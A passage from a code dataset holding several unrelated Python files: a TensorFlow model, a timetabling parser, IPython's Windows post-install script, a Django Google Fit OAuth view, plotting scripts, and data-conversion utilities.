if self.lossType == 'MAE':\n self.parameters['Loss'] = tensorflow.losses.absolute_difference(labels=self.labelInput,\n predictions=self.parameters['FinalPredict'])\n\n self.train = tensorflow.train.AdamOptimizer(learning_rate=learningRate).minimize(self.parameters['Loss'])\n\n def Train(self, logName):\n trainData, trainLabel, trainSeq = Shuffle_Part3(data=self.data, label=self.label, seq=self.seq)\n totalLoss = 0\n with open(logName, 'w') as file:\n for index in range(len(trainData)):\n loss, _ = self.session.run(fetches=[self.parameters['Loss'], self.train],\n feed_dict={self.dataInput: trainData[index],\n self.labelInput: trainLabel[index],\n self.seqInput: trainSeq[index]})\n totalLoss += loss\n file.write(str(loss) + '\\n')\n print('\\rTraining %d/%d Loss = %f' % (index, len(trainData), loss), end='')\n return totalLoss\n\n def Test(self, testData, testLabel, testSeq, logName):\n with open(logName, 'w') as file:\n for index in range(len(testData)):\n print('\\rTesting %d/%d' % (index, len(testData)), end='')\n predict = self.session.run(fetches=self.parameters['FinalPredict'],\n feed_dict={self.dataInput: testData[index], self.seqInput: testSeq[index]})\n file.write(str(testLabel[index][0]) + ',' + str(predict[0]) + '\\n')\n\n def Valid(self):\n trainData, trainLabel, trainSeq = self.data, self.label, self.seq\n\n result = self.session.run(fetches=self.parameters['First_Output'],\n feed_dict={self.dataInput: trainData[0], self.labelInput: trainLabel[0],\n self.seqInput: trainSeq[0]})\n print(result)\n print(numpy.shape(result))\n","sub_path":"DepressionRecognition/Model/DBLSTM.py","file_name":"DBLSTM.py","file_ext":"py","file_size_in_byte":8637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"312078179","text":"import fileJedi\nfrom datetime import datetime, timedelta\n\n\ndef calculateAverageTimes(events, windowSize):\n # Sort the events by timeStamp\n events = sorted(events, key=lambda k: k['timestamp'])\n\n # Build Output List\n outputList = buildOutputList(events, windowSize)\n\n # Get the average times\n outputList = fillAverageTimes(events, windowSize, outputList)\n\n return outputList\n\n\ndef fillAverageTimes(events, windowSize, outputList):\n\n for result in outputList:\n result = getMinuteAverage(result, events, windowSize)\n\n return outputList\n\n\ndef getMinuteAverage(minuteResult, events, windowSize):\n # More info in the README.md file\n avg = 0.0\n avgWords = 0.0\n numberOfEvents = 0\n toRemove = []\n\n for event in events:\n eventTime = datetime.strptime(\n event['timestamp'], '%Y-%m-%d %H:%M:%S.%f')\n\n if eventTime >= minuteResult['date'] - timedelta(0, 60 * windowSize) and eventTime <= minuteResult['date']:\n avg = avg + event['duration']\n avgWords = avgWords + event['nr_words']\n numberOfEvents = numberOfEvents + 1\n elif eventTime < minuteResult['date'] - timedelta(0, 60 * windowSize):\n toRemove.append(events.index(event))\n\n elif eventTime > minuteResult['date']:\n break\n\n for index in toRemove:\n del events[index]\n\n if numberOfEvents > 0:\n minuteResult['average_delivery_time'] = (avg / numberOfEvents)\n minuteResult['average_words_translated'] = (avgWords / numberOfEvents)\n minuteResult['average_words_per_second'] = (avgWords / avg)\n\n return minuteResult\n\n\ndef buildOutputList(events, windowSize):\n # Get first minute to show\n firstMinute = getFirstMinute(events[0]['timestamp'])\n\n # Get last minute to show\n lastMinute = getLastMinute(\n events[len(events) - 1]['timestamp'], windowSize)\n\n # Build output list\n outputList = getOutputList(firstMinute, lastMinute)\n return outputList\n\n\ndef getOutputList(firstMinute, lastMinute):\n outputList = []\n index = 0\n\n while lastMinute >= firstMinute:\n outputList.insert(\n index, {'date': firstMinute, 'average_delivery_time': 0.0, 'average_words_translated': 0.0, 'average_words_per_second': 0.0})\n firstMinute = firstMinute + timedelta(0, 60)\n index = index + 1\n\n return outputList\n\n\ndef getFirstMinute(timeStamp):\n datetimeObject = datetime.strptime(timeStamp, '%Y-%m-%d %H:%M:%S.%f')\n datetimeObject = datetimeObject.replace(second=0, microsecond=0)\n return datetimeObject\n\n\ndef getLastMinute(timeStamp, windowSize):\n datetimeObject = datetime.strptime(timeStamp, '%Y-%m-%d %H:%M:%S.%f')\n datetimeObject = datetimeObject.replace(second=0, microsecond=0)\n datetimeObject = datetimeObject + timedelta(0, 60 * windowSize)\n return datetimeObject\n","sub_path":"business.py","file_name":"business.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"654060134","text":"from xml import sax\nimport logging\nimport argparse\n\nclass Time:\n\n def __init__(self, weeks_str, days_str, start, length):\n self.weeks = set()\n for i, c in enumerate(weeks_str):\n if c == '1':\n self.weeks.add(i)\n self.days = set()\n for i, c in enumerate(days_str):\n if c == '1':\n self.days.add(i)\n self.start = start\n self.length = length\n\n def intersects(self, other):\n if self.weeks.isdisjoint(other.weeks):\n return False\n if self.days.isdisjoint(other.days):\n return False\n if self.start + self.length <= other.start:\n return False\n if other.start + other.length <= self.start:\n return False\n return True\n\n def __str__(self):\n return f'In the weeks {self.weeks}, the days {self.days}, in the time slots {self.start}-{self.start+self.length-1}.'\n\n# this maps a frozenset of rooms to a number, the distance between these rooms in time slots\nroom_distances = dict()\n\n# maps an id to a Room object\nroom_by_id = dict()\nclass Room:\n\n def __init__(self, room_id):\n self.id = room_id\n self.unavailable_times = []\n\n def add_unavailable(self, time_location):\n self.unavailable_times.append(time_location)\n\n def __str__(self):\n if not self.unavailable_times:\n return f'Room {self.id} is always available.\\n'\n s = f'Room {self.id} is unavailable:\\n'\n for time_location in self.unavailable_times:\n s += f'{time_location}\\n'\n return s\n\n'''\n A uclass represents a university class.\n'''\nuclass_by_id = dict()\nclass Uclass:\n\n def __init__(self, uclass_id):\n self.id = uclass_id\n\n self.times = dict()\n self.chosen_time = None\n\n self.rooms = dict()\n self.chosen_room = None\n\n '''\n The following dictionary maps a string like 'NotOverlap' or 'SameAttendees' to a dictionary.\n This dictionary maps a uclass to a penalty. This penalty is an integer or float('inf'). Infinity is used to\n indicate that a constraint must be met in a feasible solution.\n '''\n self.distributions = dict()\n\n def add_time(self, time_location, penalty):\n self.times[time_location] = penalty\n\n def add_room(self, room, penalty):\n self.rooms[room] = penalty\n\n def add_constraint(self, distribution_type, distribution_penalty, other_uclass):\n if distribution_type not in self.distributions:\n self.distributions[distribution_type] = dict()\n if other_uclass not in self.distributions[distribution_type]:\n self.distributions[distribution_type][other_uclass] = 0\n self.distributions[distribution_type][other_uclass] += distribution_penalty\n\n def __str__(self):\n s = f'Class {self.id} has {len(self.times)} possible times, {len(self.rooms)} possible rooms'\n s += f' and {len(self.distributions)} different constraint types:\\n'\n for room, penalty in self.rooms.items():\n s += f'Room {room.id} has penalty {penalty}.\\n'\n for time_location, penalty in self.times.items():\n s += f'{time_location} This time has penalty {penalty}.\\n'\n for distribution_name, specific_constraints in self.distributions.items():\n s += f'Distribution of type \"{distribution_name}\":\\n'\n for uclass, penalty in specific_constraints.items():\n s += f'Violation of this distribution with class {uclass.id} leads to a penalty of {penalty}.\\n'\n return s\n\nclass TimetablingHandler(sax.ContentHandler):\n\n def __init__(self):\n '''\n Indicates an important node up the branch, where we are in the XML tree at the moment. This context allows us\n to distinguish, for example, the two occurrences of the 'room' element when it's described itself,\n versus when it's used to describe a class.\n\n Takes values in ['rooms, 'subpart', None].\n '''\n self.section = None\n self.current_room = None\n self.current_uclass = None\n\n self.distribution_type = None\n self.distribution_penalty = None\n self.distribution_uclasses = None\n\n def startElement(self, tag, attributes):\n # parse the rooms\n if tag == 'rooms':\n self.section = tag\n elif tag == 'room' and self.section == 'rooms':\n room_id = int(attributes['id'])\n self.current_room = Room(room_id)\n room_by_id[room_id] = self.current_room\n elif tag == 'unavailable' and self.current_room is not None:\n weeks = attributes['weeks']\n days = attributes['days']\n start = int(attributes['start'])\n length = int(attributes['length'])\n time_location = Time(weeks, days, start, length)\n self.current_room.add_unavailable(time_location)\n elif tag == 'travel' and self.current_room is not None:\n other_room_id = int(attributes['room'])\n both_room_ids = frozenset([self.current_room.id, other_room_id])\n distance = int(attributes['value'])\n room_distances[both_room_ids] = distance\n\n # parse the classes\n elif tag == 'subpart':\n self.section = tag\n elif tag == 'class' and self.section == 'subpart':\n uclass_id = int(attributes['id'])\n self.current_uclass = Uclass(uclass_id)\n uclass_by_id[uclass_id] = self.current_uclass\n elif tag == 'room' and self.current_uclass is not None:\n penalty = int(attributes['penalty'])\n room_id = int(attributes['id'])\n room = room_by_id[room_id]\n self.current_uclass.add_room(room, penalty)\n elif tag == 'time' and self.current_uclass is not None:\n penalty = int(attributes['penalty'])\n weeks = attributes['weeks']\n days = attributes['days']\n start = int(attributes['start'])\n length = int(attributes['length'])\n time_location = Time(weeks, days, start, length)\n self.current_uclass.add_time(time_location, penalty)\n\n # parse the distributions\n elif tag == 'distributions':\n self.section = tag\n elif tag == 'distribution':\n self.distribution_type = attributes['type']\n self.distribution_penalty = int(attributes['penalty']) if 'penalty' in attributes else float('inf')\n self.distribution_uclasses = []\n elif tag == 'class' and self.distribution_uclasses is not None:\n uclass_id = int(attributes['id'])\n uclass = uclass_by_id[uclass_id]\n self.distribution_uclasses.append(uclass)\n\n def endElement(self, tag):\n if tag == 'rooms':\n self.section = None\n elif tag == 'room':\n self.current_room = None\n elif tag == 'subpart':\n self.section = None\n elif tag == 'class' and self.current_uclass is not None:\n self.current_uclass = None\n elif tag == 'distributions':\n self.section = None\n elif tag == 'distribution':\n for uclass in self.distribution_uclasses:\n for other_uclass in self.distribution_uclasses:\n if other_uclass == uclass: continue\n uclass.add_constraint(self.distribution_type, self.distribution_penalty, other_uclass)\n self.distribution_type = None\n self.distribution_penalty = None\n self.distribution_uclasses = None\n\ndef check_constraints(assigned_ids, uclass, time_location):\n for uclass_id in assigned_ids:\n other_uclass = uclass_by_id[uclass_id]\n same_rooms = other_uclass.chosen_room is not None and uclass.chosen_room is not None and other_uclass.chosen_room == uclass.chosen_room\n times_intersect = other_uclass.chosen_time.intersects(time_location)\n if same_rooms and times_intersect:\n return False\n return True\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--verbose', '-v', action='count')\n args = parser.parse_args()\n log_levels = {\n None: logging.WARNING,\n 1: logging.INFO,\n 2: logging.DEBUG\n }\n logging.basicConfig(format='%(message)s', level=log_levels[args.verbose])\n\n parser = sax.make_parser()\n parser.setContentHandler(TimetablingHandler())\n parser.parse('instances/bet-sum18.xml')\n\n logging.debug(f'I found the rooms:\\n')\n for room_id, room in room_by_id.items():\n logging.debug(f'{room}')\n\n logging.debug(f'The room distances are:\\n')\n for two_rooms, distance in room_distances.items():\n logging.debug(f'Rooms {two_rooms} have distance {distance}\\n')\n\n logging.debug('The classes are:')\n for uclass_id, uclass in uclass_by_id.items():\n logging.debug(uclass)\n\n assigned_ids = []\n for uclass_id, uclass in uclass_by_id.items():\n\n possible_rooms = uclass.rooms if uclass.rooms else [None]\n for room in possible_rooms:\n is_consistent = False\n uclass.chosen_room = room\n for time_location in uclass.times:\n is_consistent = check_constraints(assigned_ids, uclass, time_location)\n if is_consistent:\n uclass.chosen_time = time_location\n break\n if is_consistent:\n break\n\n if not is_consistent:\n logging.debug(f'Given prior allocations, class {uclass_id} cannot be allocated.')\n logging.debug(f'Prior allocations are:')\n for uclass_id in assigned_ids:\n uclass = uclass_by_id[uclass_id]\n if uclass.chosen_room is not None:\n logging.debug(f'Class {uclass_id} is assigned room {uclass.chosen_room.id}')\n if uclass.chosen_time is not None:\n logging.debug(f'Class {uclass_id} is assigned time: {uclass.chosen_time}')\n exit(1)\n assigned_ids.append(uclass_id)\n\n logging.debug('The assignments are:')\n for uclass_id, uclass in uclass_by_id.items():\n if uclass.chosen_room is not None:\n logging.debug(f'Class {uclass_id} is assigned room {uclass.chosen_room.id}')\n if uclass.chosen_time is not None:\n logging.debug(f'Class {uclass_id} is assigned time: {uclass.chosen_time}')\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"602519621","text":"#!python\n\"\"\"Distutils post installation script for Windows.\n\nhttp://docs.python.org/2/distutils/builtdist.html#the-postinstallation-script\n\n\"\"\"\n\n\nimport os\nimport sys\nimport shutil\n\ntry:\n import setuptools\n have_setuptools = True\nexcept ImportError:\n have_setuptools = False\n\n\npjoin = os.path.join\n\n# suffix for start menu folder names\npyver = \"(Py%i.%i %i bit)\" % (sys.version_info[0], sys.version_info[1],\n (32, 64)[sys.maxsize > 2**32])\n\n\ndef mkshortcut(target, description, linkdir, arguments=\"\", iconpath='',\n workdir=\"%HOMEDRIVE%%HOMEPATH%\", iconindex=0):\n \"\"\"Make a shortcut if it doesn't exist and register its creation.\"\"\"\n filename = pjoin(linkdir, description + '.lnk')\n description = \"%s %s\" % (description, pyver)\n create_shortcut(target, description, filename, arguments, workdir,\n iconpath, iconindex)\n file_created(filename)\n\n\ndef arguments(scriptsdir, script, scriptargs=''):\n \"\"\"Return command line arguments to be passed to the python executable.\"\"\"\n cmdbase = suffix(pjoin(scriptsdir, script))\n if have_setuptools:\n cmdbase += '-script.py'\n return '\"%s\" %s' % (cmdbase, scriptargs)\n\n\ndef suffix(s):\n \"\"\"Add '3' suffix to programs for Python 3.\"\"\"\n if sys.version_info[0] == 3:\n s = s + '3'\n return s\n\n\ndef install():\n \"\"\"Routine to be run by the win32 installer with the -install switch.\"\"\"\n # Get some system constants\n python = pjoin(sys.prefix, 'python.exe')\n pythonw = pjoin(sys.prefix, 'pythonw.exe')\n\n if not have_setuptools:\n # This currently doesn't work without setuptools,\n # so don't bother making broken links\n print(\"Setuptools is required to\"\n \" create Start Menu items.\", file=sys.stderr)\n print(\"Re-run this installer after installing\"\n \" Setuptools to get Start Menu items.\", file=sys.stderr)\n return\n\n # Lookup path to common startmenu ...\n ip_start_menu = pjoin(get_special_folder_path('CSIDL_COMMON_PROGRAMS'),\n 'IPython %s' % pyver)\n\n # Create IPython entry ...\n if not os.path.isdir(ip_start_menu):\n os.mkdir(ip_start_menu)\n directory_created(ip_start_menu)\n\n # Create .py and .bat files to make things available from\n # the Windows command line. Thanks to the Twisted project\n # for this logic!\n programs = [\n 'ipython',\n 'iptest',\n ]\n programs = [suffix(p) for p in programs]\n scripts = pjoin(sys.prefix, 'scripts')\n if not have_setuptools:\n # only create .bat files if we don't have setuptools\n for program in programs:\n raw = pjoin(scripts, program)\n bat = raw + '.bat'\n py = raw + '.py'\n # Create .py versions of the scripts\n shutil.copy(raw, py)\n # Create .bat files for each of the scripts\n bat_file = file(bat, 'w')\n bat_file.write(\"@%s %s %%*\" % (python, py))\n bat_file.close()\n\n # Create Start Menu shortcuts\n iconpath = pjoin(scripts, 'ipython.ico')\n mkshortcut(python, 'IPython', ip_start_menu,\n arguments(scripts, 'ipython'), iconpath)\n mkshortcut(python, 'IPython (pylab mode)', ip_start_menu,\n arguments(scripts, 'ipython', '--pylab'), iconpath)\n\n iconpath = pjoin(scripts, 'ipython_nb.ico')\n mkshortcut(python, 'IPython Notebook', ip_start_menu,\n arguments(scripts, 'ipython', 'notebook'), iconpath)\n\n mkshortcut(pythonw, 'IPython Documentation', ip_start_menu,\n '-m webbrowser -t \"http://ipython.org/documentation.html',\n iconpath='url.dll')\n\n # Disable pysh Start item until the profile restores functionality\n # Most of this code is in IPython/deathrow, and needs to be updated\n # to 0.11 APIs\n #mkshortcut(python, 'IPython%s (command prompt mode)', ip_start_menu,\n # arguments(scripts, 'ipython', 'profile=pysh --init'))\n\n\ndef remove():\n \"\"\"Routine to be run by the win32 installer with the -remove switch.\"\"\"\n pass\n\n\n# main()\nif len(sys.argv) > 1:\n if sys.argv[1] == '-install':\n try:\n install()\n except OSError:\n print(\"Failed to create Start Menu items, try running the\"\n \" installer as administrator.\", file=sys.stderr)\n elif sys.argv[1] == '-remove':\n remove()\n else:\n print(\"Script was called with option %s\" % sys.argv[1],\n file=sys.stderr)\n","sub_path":"scripts/ipython_win_post_install.py","file_name":"ipython_win_post_install.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"553170786","text":"import os\n#from shutil import copyfile\n#from pathlib import Path\n\ndef createFolder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print('Error: Creating directory. ' + directory)\n\ndef getListOfFiles(dirName):\n # create a list of file and sub directories \n # names in the given directory \n listOfFile = os.listdir(dirName)\n allFiles = list()\n # Iterate over all the entries\n for entry in listOfFile:\n # Create full path\n fullPath = os.path.join(dirName, entry)\n # If entry is a directory then get the list of files in this directory \n if os.path.isdir(fullPath):\n allFiles = allFiles + getListOfFiles(fullPath)\n else:\n allFiles.append(fullPath)\n \n return allFiles \n\n\nnormalfolderpath = '/home/misumi/Desktop/PCLDevelopment_ConversionTool/Data/MisumiData/Cantilever/PLY'\ndatafolderpath = '/home/misumi/Desktop/PCLDevelopment_ConversionTool/Data/MisumiData/Cantilever/uData/'\n\n # get all files and folders name in the current directory\ntextfilenames = getListOfFiles(normalfolderpath) \n\nfor f in textfilenames: #loop through all the files and folders\n if \".ply\" in f:\n getbasepath = os.path.split(f)\n basename = getbasepath[0]\n foldername = os.path.split(basename)\n datadestinationpath = datafolderpath + foldername[1] +'/'+ os.path.split(os.path.splitext(f)[0])[1]+ \".ply\"\n \n createfolder = os.path.join(datafolderpath,foldername[1])\n createFolder(createfolder)\n \n file = open(f, \"r+\")\n # print(file)\n lines = [line.rstrip() for line in file]\n # skipinfo = lines[10:]\n filedata = open(datadestinationpath, \"w\")\n head = \"ply\\nformat ascii 1.0\\ncomment VCGLIB generated\\nelement vertex 2048\" + \"\\nproperty float x\\nproperty float y\\nproperty float z\\nelement face 0\\nproperty list uchar int vertex_indices\\nend_header\\n\"\n \n for i in lines[:10]:\n filedata.write(i + '\\n')\n \n for i in lines[10:]:\n firstline = i.split(' ')[0:3]\n firstline = ','.join(firstline)\n # file.seek(0)\n \n filedata.write(firstline.replace(',',' ') + '\\n')\n \n filedata.close() \n file.close()\n \n ","sub_path":"PCL_DataConversion/makedata.py","file_name":"makedata.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"430647267","text":"import trafaret as t\n\nfrom datarobot.models.api_object import APIObject\n\nfrom ..utils import encode_utf8_if_py2\n\n\nclass SharingAccess(APIObject):\n \"\"\" Represents metadata about whom a entity (e.g. a data store) has been shared with\n\n .. versionadded:: v2.14\n\n Currently :py:class:`DataStores `,\n :py:class:`DataSources `,\n :py:class:`Projects ` (new in version v2.15) and\n :py:class:`CalendarFiles ` (new in version 2.15) can be shared.\n\n This class can represent either access that has already been granted, or be used to grant access\n to additional users.\n\n Attributes\n ----------\n username : str\n a particular user\n role : str or None\n if a string, represents a particular level of access and should be one of\n ``datarobot.enums.SHARING_ROLE``. For more information on the specific access levels, see\n the :ref:`sharing ` documentation. If None, can be passed to a `share`\n function to revoke access for a specific user.\n can_share : bool or None\n if a bool, indicates whether this user is permitted to further share. When False, the\n user has access to the entity, but can only revoke their own access but not modify any\n user's access role. When True, the user can share with any other user at a access role up\n to their own. May be None if the SharingAccess was not retrieved from the DataRobot server\n but intended to be passed into a `share` function; this will be equivalent to passing True.\n user_id : str\n the id of the user\n \"\"\"\n\n _converter = t.Dict(\n {\n t.Key(\"username\"): t.String,\n t.Key(\"role\"): t.String,\n t.Key(\"can_share\", default=None): t.Or(t.Bool, t.Null),\n t.Key(\"user_id\", default=None): t.Or(t.String, t.Null),\n }\n ).ignore_extra(\"*\")\n\n def __init__(self, username, role, can_share=None, user_id=None):\n self.username = username\n self.role = role\n self.can_share = can_share\n self.user_id = user_id\n\n def __repr__(self):\n return encode_utf8_if_py2(\n (\n \"{cls}(username: {username}, role: {role}, \"\n \"can_share: {can_share}, user_id: {user_id})\"\n ).format(\n cls=self.__class__.__name__,\n username=self.username,\n role=self.role,\n can_share=self.can_share,\n user_id=self.user_id,\n )\n )\n\n def collect_payload(self):\n \"\"\" Set up the dict that should be sent to the server in order to share this\n\n Returns\n -------\n payload : dict\n \"\"\"\n payload = {\"username\": self.username, \"role\": self.role}\n if self.can_share is not None:\n payload[\"can_share\"] = self.can_share\n return payload\n","sub_path":"datarobot/models/sharing.py","file_name":"sharing.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"225262250","text":"import numpy as np\nimport pandas as pd\nimport os\nimport scipy\nfrom scipy import signal\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nmatplotlib.use(\"pgf\")\nplt.rcParams.update({\n \"pgf.texsystem\": \"pdflatex\",\n \"font.family\": \"serif\",\n \"font.size\": 6,\n \"legend.fontsize\": 5,\n \"text.usetex\": True,\n \"pgf.rcfonts\": False\n});\n\nplt.figure(figsize=(2.65, 1.5))\ndata_path = \"data/multi_walker/\"\n\n\ndf = pd.read_csv(os.path.join(data_path,'sa_ddpg.csv'))\ndf = df[['episodes_total', \"episode_reward_mean\"]]\ndata = df.to_numpy()\nplt.plot(data[:, 0], data[:, 1], '--', label='DDPG (Independent)', linewidth=0.6, linestyle=(0, (5, 2, 1, 2)))\n\n\ndf = pd.read_csv(os.path.join(data_path,'ddpg_5.csv'))\ndf = df[['episodes_total', \"episode_reward_mean\"]]\ndata = df.to_numpy()\nplt.plot(data[:, 0], data[:, 1], '--', label='DDPG (Shared)', linewidth=0.6, linestyle=(0, (1, 1)))\n\ndf = pd.read_csv(os.path.join(data_path, 'maddpg.csv'))\ndf = df[['episode', \"reward\"]]\ndata = df.to_numpy()\nplt.plot(data[:, 0], data[:, 1], label='MADDPG', linewidth=0.6, color='grey', linestyle='solid')\n\nplt.xlabel('Episode', labelpad=1)\nplt.ylabel('Average Total Reward', labelpad=1)\nplt.title('Multiwalker')\nplt.xticks(ticks=[10000,20000,30000,40000,50000],labels=['10k','20k','30k','40k','50k'])\nplt.xlim(0, 60000)\nplt.yticks(ticks=[-150,-100,-50,0],labels=['-150','-100','-50','0'])\nplt.ylim(-190, 15)\nplt.tight_layout()\nplt.legend(loc='upper right', ncol=1, labelspacing=.2, columnspacing=.25, borderpad=.25, bbox_to_anchor=(1., 0.85))\n# plt.legend(loc='lower center', ncol=1, labelspacing=.2, columnspacing=.25, borderpad=.25, bbox_to_anchor=(0.5, -0.75))\nplt.margins(x=0)\nplt.savefig(\"DDPGMultiwalkerGraph_camera.pgf\", bbox_inches = 'tight',pad_inches = .025)\nplt.savefig(\"DDPGMultiwalkerGraph_camera.png\", bbox_inches = 'tight',pad_inches = .025, dpi=600)\n","sub_path":"parametersharingmadrl/plot/plot_ddpg_maddpg_multiwalker.py","file_name":"plot_ddpg_maddpg_multiwalker.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"73439474","text":"from django.shortcuts import render\nimport json\nfrom .models import OauthCreds\n# Create your views here.\nfrom googleapiclient.discovery import build\nfrom django.shortcuts import render,redirect\nfrom datetime import datetime\nimport time\nimport google.oauth2.credentials\nimport google_auth_oauthlib.flow\nimport httplib2\nimport google_auth_httplib2\n# Create your views here.\n\ndef logout_google(request):\n\tfor i in OauthCreds.objects.all():\n\t\tif i.user == request.user:\n\t\t\ti.delete()\n\t\t\tbreak\n\treturn redirect('auth_display')\n\ndef calc_step(data):\n\tsteps = 0\n\tfor i in data['point']:\n\t\tsteps+=int(i['value'][0]['intVal'])\n\treturn steps\n\ndef calc_calorie(data):\n\tcalories = 0.0\n\tfor i in data['point']:\n\t\tcalories+=(i['value'][0]['fpVal'])\n\treturn int(calories)\n\ndef calc_distance(data):\n\tdistance = 0.0\n\tfor i in data['point']:\n\t\tdistance+=(i['value'][0]['fpVal'])\n\treturn int(distance)\n\ndef calc_height(data):\n\theight = 0\n\tfor i in data['point']:\n\t\theight = i['value'][0]['fpVal']\n\treturn int(height*100)\n\ndef calc_weight(data):\n\tweight = 0\n\tfor i in data['point']:\n\t\tweight = i['value'][0]['fpVal']\n\treturn int(weight)\n\ndef start(request):\n\tflag = False\n\tfor i in OauthCreds.objects.all():\n\t\tif i.user == request.user:\n\t\t\tflag = True\n\tcontext = {}\n\tif not flag:\n\t\tcontext = { 'signed_in' : False , 'auth_url':'http://127.0.0.1:8000/fit/oauth'}\n\telse:\n\t\tcontext = oauthCallback(request)\n\treturn render(request,'start.html',context)\ndef extra(request):\n\treturn render(request,'extra.html')\ndef get_data_set():\n\ttoday = datetime.today().date()\n\tnow = datetime.today()\n\tstart = int(time.mktime(today.timetuple())*1000000000)\n\tend = int(time.mktime(now.timetuple())*1000000000)\n\tdata_set = \"%s-%s\" % (start, end)\n\treturn data_set\n\ndef oauthCallback(request):\n\n\t#print(q)\n\tscopes = [\"https://www.googleapis.com/auth/contacts.readonly\",\n\t\"https://www.googleapis.com/auth/fitness.activity.read\",\n\t\"https://www.googleapis.com/auth/fitness.body.write\",\n\t\"https://www.googleapis.com/auth/fitness.location.write\" ,\n\t\"https://www.googleapis.com/auth/fitness.activity.write\"\n\t]\n\n\tflow = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n './credentials.json',\n scopes)\n\tflow.redirect_uri = 'http://127.0.0.1:8000/fit/oauth'\n\tisAuthorized = False\n\tfor i in OauthCreds.objects.all():\n\t\tif i.user == request.user:\n\t\t\tisAuthorized = True\n\tif not isAuthorized:\n\t\tq = request.GET\n\t\tif not q:\n\t\t\tauthorization_url, state = flow.authorization_url(\n\t \taccess_type='offline',\n\t \tinclude_granted_scopes='true')\n\t\t\treturn redirect(authorization_url)\n\n\t\telse:\n\t\t\tcode = request.GET['code']\n\t\t\tflow.fetch_token(code = code)\n\t\t\tcredentials = flow.credentials\n\n\t\t\tOauthCreds.objects.create(user = request.user,creds = credentials)\n\n\telse:\n\t\tprint(\"herelmao\",request.user.data.all()[0].user)\n\t\tprint(\"here\",request.user.data.all()[0].creds)\n\t\tcredentials = request.user.data.all()[0].creds\n\tdatasourceid_steps = \"derived:com.google.step_count.delta:com.google.android.gms:estimated_steps\"\n\tdatasourceid_calories = \"derived:com.google.calories.expended:com.google.android.gms:platform_calories_expended\"\n\tdatasourceid_distance = \"derived:com.google.distance.delta:com.google.android.gms:merge_distance_delta\"\n\tdatasourceid_height = \"raw:com.google.height:com.google.android.apps.fitness:user_input\"\n\tdatasourceid_weight = \"raw:com.google.weight:com.google.android.apps.fitness:user_input\"\n\n\n\n\tdataset = get_data_set()\n\tdataset1 = '0-'+dataset.split('-')[1]\n\tif credentials.expired:\n\t\tcredentials.refresh(Request())\n\n\t#url = \"GET https://www.googleapis.com/fitness/v1/users/me/dataSources/%s/datasets/%s\"%(datasourceid,dataset)\n\tfitness_service = build('fitness', 'v1', credentials = credentials)\n\tsteps = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_steps, datasetId = dataset).execute()\n\tcalories = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_calories, datasetId = dataset).execute()\n\tdistance = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_distance, datasetId = dataset).execute()\n\theight = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_height, datasetId = dataset1).execute()\n\tweight = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_weight, datasetId = dataset1).execute()\n\n\tsteps = calc_step(steps)\n\tcalories = calc_calorie(calories)\n\tdistance = calc_distance(distance)\n\theight = calc_height(height)\n\tweight = calc_weight(weight)\n\t\t#steps+= int(i['value'][0]['intVal'])\n\tres = {\"signed_in\" : True, \"step_count\" : steps, \"calories\":calories , \"distance\" : distance, \"height\" : height, \"weight\" : weight}\n\t\t#steps+= int(i['value'][0]['intVal'])\n\tif isAuthorized:\n\t\treturn res\n\telse:\n\t\treturn redirect('auth_display')\n\t\t#response.json()\n","sub_path":"fit_data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"599020222","text":"import os\nimport random\n\ndata_dir = '../data'\ntrain_file = 'train_data'\ntest_file = 'test_data'\nnum_part = 4\n\ndef get_data(filename, is_shuffle=True):\n samples = []\n with open(filename, 'r') as f:\n for line in f:\n samples.append(line)\n if is_shuffle:\n random.shuffle(samples)\n return samples\n\ndef gen_data(filename, n, dimension):\n with open(filename,'w') as f:\n for _ in range(n):\n f.write(str(random.randint(0,1))+' ')\n f.write(' '.join([str(x)+':'+str(random.uniform(0,10)) \\\n for x in range(dimension)]) + '\\n')\ntrain_dir = os.path.join(data_dir, 'train')\ntest_dir = os.path.join(data_dir, 'test')\nmodel_dir = os.path.join(data_dir, 'models')\n\nif not os.path.isdir(train_dir):\n os.mkdir(train_dir)\nif not os.path.isdir(test_dir):\n os.mkdir(test_dir)\nif not os.path.isdir(model_dir):\n os.mkdir(model_dir)\n\nprint('generating train data...')\ngen_data(os.path.join(data_dir,train_file), 10000, 100)\nsamples = get_data(os.path.join(data_dir, train_file))\nnum_train = len(samples)\nindex = 0\nprint(num_train)\npart_size = int(num_train / num_part)\nfor part in range(num_part):\n with open(os.path.join(train_dir, 'part-00{}'.format(part + 1)), 'w') as f:\n for j in range(0, part_size):\n f.write(samples[index])\n index += 1\n\nprint('generating test data...')\nsamples = get_data(os.path.join(data_dir, train_file))\nnum_test = len(samples)\nwith open(os.path.join(test_dir, 'part-001'), 'w') as f:\n for i in range(0, num_test):\n 